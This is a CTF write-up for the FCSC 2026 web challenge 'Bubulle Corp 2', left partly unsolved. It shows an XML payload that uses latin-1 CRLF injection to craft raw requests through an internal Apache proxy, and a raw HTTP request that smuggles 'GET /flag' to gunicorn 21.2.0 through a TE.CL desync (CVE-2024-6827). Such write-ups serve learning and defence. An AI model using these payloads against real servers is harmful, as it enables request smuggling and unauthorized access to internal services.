pwneglyph logo
web web-server http-request-smuggling te-cl cve-2024-6827 gunicorn apache httpprotocoloptions-unsafe pycurl crlf-injection latin1 xml lxml ssrf reverse-proxy unsolved

Sequel to Bubulle Corp. Same XML find() SSRF, but with latin-1 CRLF injection through the icon method/body fields you craft raw requests to the internal Apache proxy. A Transfer-Encoding\xa0 desync against gunicorn 21.2.0 (CVE-2024-6827) smuggles GET /flag to the backend — but reflecting the second response back through Apache was not solved.

Bubulle Corp 2 — CRLF-in-XML → Apache/gunicorn TE.CL smuggling (partial / unsolved)

CTF: FCSC 2026 · Category: Web (server-side) · Author: Mizu · Status: ⚠️ not fully solved — documents the confirmed primitives and where it stalled.

What's different from part 1

Same three-service setup and the same XML find('.//icon_url') SSRF as Bubulle Corp. The proxy is unchanged:

HttpProtocolOptions Unsafe
AliasMatch "^/.+" "/flag.txt"
<Location "/"> ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On </Location>

The easy AliasMatch path still yields flag_placeholder_1 (a decoy). The real flag (flag_placeholder_2, 70 chars on remote) is only returned by the backend's /flag route:

# internal-backend/app.py
@app.route("/", methods=["POST", "GET"])
def index(): return "Hello World!"
@app.route("/flag")
def flag(): return environ.get("FLAG")

Reaching /flag means the request must arrive at the backend (Apache only proxies / there) — i.e. it must be smuggled past Apache as if it were the body of a request to /. icon.py also added PROTOCOLS/REDIR_PROTOCOLS = HTTP|HTTPS, killing gopher/file SSRF, so the only lever is raw HTTP through the proxy.

Primitive 1 — raw request crafting via latin-1 CRLF in XML

As in Secure Mood Notes, method/body are sent to pycurl with .encode("latin1") (no \xc2 prefixing), and lxml decodes numeric character references, so &#13;&#10; becomes a real CRLF inside the value:

ET.fromstring('<x>aaa&#13;&#10;bbb</x>').text   # 'aaa\r\nbbb'

Combined with the nested-icon_url validation bypass, you can inject CRLFs into the request line pycurl sends to the internal proxy — i.e. control a raw request to Apache. Example that reaches flag_placeholder_1 through the proxy via an injected request line:

<settings>
  <body>x<method>POST /working_req HTTP/1.1&#13;&#10;Eat:</method>
        <icon_url>http://bubulle-corp-internal-proxy</icon_url></body>
  <method>GET</method>
  <icon_url>https://example.com</icon_url>
</settings>

Primitive 2 — TE.CL desync against gunicorn (CVE-2024-6827)

gunicorn 21.2.0 mishandles Transfer-Encoding, falling back to Content-Length (TE.CL smuggling). Apache runs HttpProtocolOptions Unsafe, so malformed header names slip through. Using a non-breaking space (\xa0) in the header name desyncs the two parsers — Apache ignores the bad Transfer-Encoding and frames by Content-Length, while gunicorn treats the body as a second pipelined request. This did get GET /flag delivered to the backend:

POST / HTTP/1.1
Host: bubulle-corp-internal-proxy
Connection\xa0: keep-alive
Transfer-Encoding\xa0: chunked
Content-Length: 64

0

GET /flag HTTP/1.1
Host: bubulle-corp-internal-backend

Backend access log confirmed both hit it:

"POST / HTTP/1.1" 200 12
"GET /flag HTTP/1.1" 200 24      <-- our smuggled request reached the backend

Where it stalled (the unsolved part)

Apache only returned the response to the first request; the smuggled /flag response was consumed but never reflected back. Things that did not work to surface the second response:

  • HEAD / OPTIONS as the outer method (Apache still framed by the backend's Content-Length).
  • HEAD /%2f plus extra pipelined requests to shift response boundaries.
  • Expect: 100-continue games.
  • Note: gunicorn rejects HTTP/0.9, so it always emits a Content-Length, which lets Apache cleanly delimit and drop the extra response. A fake backend that omitted Content-Length proved Apache would then read/return everything — but you can't make the real gunicorn drop it.
  • pycurl opens a fresh connection per fetch, so connection-reuse/queue-poisoning across requests is out.

The challenge author hinted there was a smuggling technique not yet tried ("documente-toi à nouveau sur les techniques de smuggling, y'a des idées que t'as pas encore eu"). The likely missing idea is a different response-desync / framing trick (e.g. an Expect/100-continue or chunked-response angle per HTTP/1 Must Die-class research) that makes Apache return the second response. Left unsolved.

Takeaways (generalized technique)

  • latin-1-encoded fields + XML numeric character references (&#13;&#10;) = CRLF injection into an outbound request the server builds (pycurl CUSTOMREQUEST/POSTFIELDS) — request smuggling/SSRF primitive.
  • HttpProtocolOptions Unsafe + a malformed header name (non-breaking space \xa0 in the name) is a reliable Apache↔gunicorn parser desync; gunicorn 21.2.0 is TE.CL-vulnerable (CVE-2024-6827).
  • Getting the smuggled request delivered is only half the battle — reflecting its response back through an intermediary needs a response-framing desync (no Content-Length, oversized Content-Length, or making the proxy skip the first response). When the upstream always sends a clean Content-Length, a naive proxy will swallow the extra response.

Sources & references